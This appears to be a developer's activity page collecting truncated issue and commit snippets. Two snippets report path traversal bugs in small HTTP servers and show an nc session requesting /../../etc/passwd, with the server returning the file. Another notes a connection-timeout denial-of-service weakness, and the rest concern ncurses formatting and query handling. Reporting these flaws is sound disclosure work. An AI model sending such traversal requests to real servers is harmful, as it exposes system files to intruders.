Noah Goldsmid
It is possible to read every file on the system using ../, try:
    [cotix@lithium ~]$ nc localhost 8080
    GET /../../../../../../../etc/passwd HTTP/1.0
    HTTP/1.0 200 OK
    Content-Type: text/plain
    root: x:0:0:root:/root:/bin/bash
    ... rest...
I love ncurses, but we can't just dump all comments in one big pile. We need some kind of formatting.
Using an include results in fetching every object individually, even when this is not necessary. This commit evaluates the given query and uses the resulting objects instead. If your data...
It is possible to request parent directories.
    cotix@lithium:~$ nc localhost 9999
    GET /../../../../../etc/passwd HTTP/1.0
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Cache-Control: no-cache
    Content-length: 2333
    Content-type: text/plain
    root:x:0:0:root:/root:/bin/bash
    ... my whole /etc/passwd...
There seems to be no timeout on the connections. Since every connection takes up a whole thread, this is a very simple DoS vulnerability. To make matters worse, because the...